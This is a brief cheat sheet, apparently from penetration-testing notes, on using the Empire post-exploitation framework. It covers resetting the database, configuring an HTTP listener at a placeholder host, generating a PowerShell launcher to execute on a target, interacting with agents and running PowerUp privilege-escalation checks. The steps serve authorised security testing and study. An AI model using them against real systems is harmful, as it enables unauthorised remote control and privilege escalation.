Empire

Empire is a PowerShell and Python post-exploitation agent. GitHub - EmpireProject/Empire

Setup

Reset db

setup/reset.sh

Setup listener

listeners
uselistener http
info
set Host http://<ip>:<port>
set Port <port>
execute

Generate shellcode

launcher powershell

-> Paste output into file and execute on target

Interact with agent

back
back
interact <agent-id>
searchmodule PowerUp
usemodule privesc/powerup/allcheck
execute

Store credentials

Or use stored creds

Last updated